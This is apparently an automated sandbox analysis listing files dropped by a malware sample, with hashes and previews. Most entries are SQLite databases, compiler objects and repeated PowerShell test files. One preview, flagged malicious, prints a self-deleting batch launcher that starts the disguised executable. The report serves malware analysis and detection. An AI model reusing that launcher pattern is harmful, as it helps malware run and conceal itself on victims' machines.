                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                          Category:dropped
                                                                                                          Size (bytes):51200
                                                                                                          Entropy (8bit):0.8746135976761988
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25
                                                                                                          Entropy (8bit):4.293660689688185
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:z15svk+V2k2n:XE2k2
                                                                                                          MD5:567B8C00B41A8A89999562B6D1C1428B
                                                                                                          SHA1:3550A00F16BBAB2C29755E3C810755C88A8F726D
                                                                                                          SHA-256:821BDF43E2E227EBD5814FD78D73C1CF05732282DA1AB08521A7FF534DD12F0F
                                                                                                          SHA-512:B6DB57F943A5DF067E527C49A0AA49DF3C20C99ADD8C6221E6B2D2227C74B0D2F8E3D00F865CE4F4CF148A72A06323A702807839D99B791F745668567BFCA9B1
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:XVpPwoIRwiA6W0ZmTR3FqVrdV
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25
                                                                                                          Entropy (8bit):4.5638561897747225
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:sxMEy:sKEy
                                                                                                          MD5:B6DF2FC2F478EA95FA47F578CD54233E
                                                                                                          SHA1:FEE8473854CCC77DCF534C916FA35132F3C34A46
                                                                                                          SHA-256:BBFBC0391D905010363252EC684B8BD93F44BBECB2A74A604B8063AA41CE80C3
                                                                                                          SHA-512:FBA377BAECBC6752E0899EE80DD7CD8C958A5A5F882D543DAA52669BD5C713E8C89ACA84C6F60C8598B992F780E842B503EF396D98ECE6B3358CBC6924924782
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:NgGzfn6dlpU4Vwt0QqjIi7Rt1
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):245
                                                                                                          Entropy (8bit):5.402423599137763
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:hCijTg3Nou1SV+DER5SMLUnkAIyKOZG1923fryJ:HTg9uYDEfSMYnbfDC
                                                                                                          MD5:7A42B66A95974ACCEBE87D8D19C33D0A
                                                                                                          SHA1:6120DDC30122A7F7741650352721CB6CC1822CE5
                                                                                                          SHA-256:A918B8DE1B70544000FC12C9F2AFF402042EC79BB4749A7E61E79271A8DBDDA5
                                                                                                          SHA-512:8AA7C4CB8252A19EA4581183A928834F5C4FAE0BA86CCFC4D140E2072BE62E65A54CD3E21CC0B30AA63D323C7773F29BD7C75E5F1B2B2E3EBC1E4C8E0829F899
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          Reputation:unknown
                                                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\KDhudFNWvk.bat"
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                          Category:dropped
                                                                                                          Size (bytes):196608
                                                                                                          Entropy (8bit):1.121297215059106
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f8, 10 symbols, created Wed Jan 8 17:21:29 2025, 1st section name ".debug$S"
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1968
                                                                                                          Entropy (8bit):4.63694795451059
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:H/DW9+aLzuuHDwKTaN6lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+GcN:vaLzuu0KeklmuulB+hnqXSfbNtmhT
                                                                                                          MD5:73F67B3CE33A3CF511F3838E4549B3D9
                                                                                                          SHA1:83F69E5F60CEF9ADBE06FD114CB80FD1A74DE072
                                                                                                          SHA-256:74E3A4325738F4D9BC7D5589F3B04708905979233D761EA97B7B043B696FCBC7
                                                                                                          SHA-512:18B1EF8D0CA66D53F969406B92A38D4C2FE4244EAEA4926D8025A10FB751BA114511C7DAB588D8342FDA8C89F28AA15EB38F19E51BA923FD89E7348991D048E7
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L.....~g.............debug$S............................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSCCB61929627DF440F9E17C549CE99168.TMP.....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RESAD56.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x710, 10 symbols, created Wed Jan 8 17:21:30 2025, 1st section name ".debug$S"
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1992
                                                                                                          Entropy (8bit):4.586497160870922
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:HLy9qOOXQHRwKTaNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+mUZ:rXQaKeMluOulajfqXSfbNtmhRZ
                                                                                                          MD5:133606FEAEB274A06ADFDF2F3238C45C
                                                                                                          SHA1:4447F01100301068FB20BEB9B4FF20500DD554B3
                                                                                                          SHA-256:E8BF0AC117D8B79CCD4DFA2A5D3EB3BBFF08DDF0B6864AC1413596F3C5A5F053
                                                                                                          SHA-512:CDF50B4DBA27C8B7903D09CEB947BD26A37DDE7253EA14948C22456EE87B595CBF681714BFCF32EE2D1E1A71EC1D800784F08F919800DB49C7E557EA468DB72B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L.....~g.............debug$S........`...................@..B.rsrc$01............................@..@.rsrc$02........p...................@..@........;....c:\Windows\System32\CSCE2A537B39618441DAC64E34137FF17.TMP...................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RESAFE6.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f0, 10 symbols, created Wed Jan 8 17:21:31 2025, 1st section name ".debug$S"
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1960
                                                                                                          Entropy (8bit):4.613180525518033
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Hll9rW92aflHowKTaNqlWxjkuZhNUGQBXPNnqpdt4+lEbNFjMyi0+OK8:jadXKeUlWuulUGQBFqXSfbNtmhM
                                                                                                          MD5:FACDCF3CC9E40E6175D9A32F1368D87A
                                                                                                          SHA1:5A12FAA338E34B365EDDC0CD93448C4E9446AE02
                                                                                                          SHA-256:02D9662C7221197FCBD28D5C42419B37AE0D8CFB27B40DD2F9CF7FDAC2BEA741
                                                                                                          SHA-512:E7BB048BDA9263E2CE8472BD1482B520473684A47AD9B85430E55F7DCCB4571AD16550AE063D4A384C44BC5F0D95E0284F3C730C92548FAD1D2E22EC32A4FD2A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L.....~g.............debug$S........h...................@..B.rsrc$01............................@..@.rsrc$02........H...................@..@........D....c:\Program Files\Everything\CSCA17046CBF8B64A188168A4AB380809F.TMP..................Wz..-S..3..%..........5.......C:\Users\user\AppData\Local\Temp\RESB66E.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................T...............................................T.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...@.....I.
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.8439810553697228
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                          MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                          SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                          SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                          SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                          Category:dropped
                                                                                                          Size (bytes):40960
                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
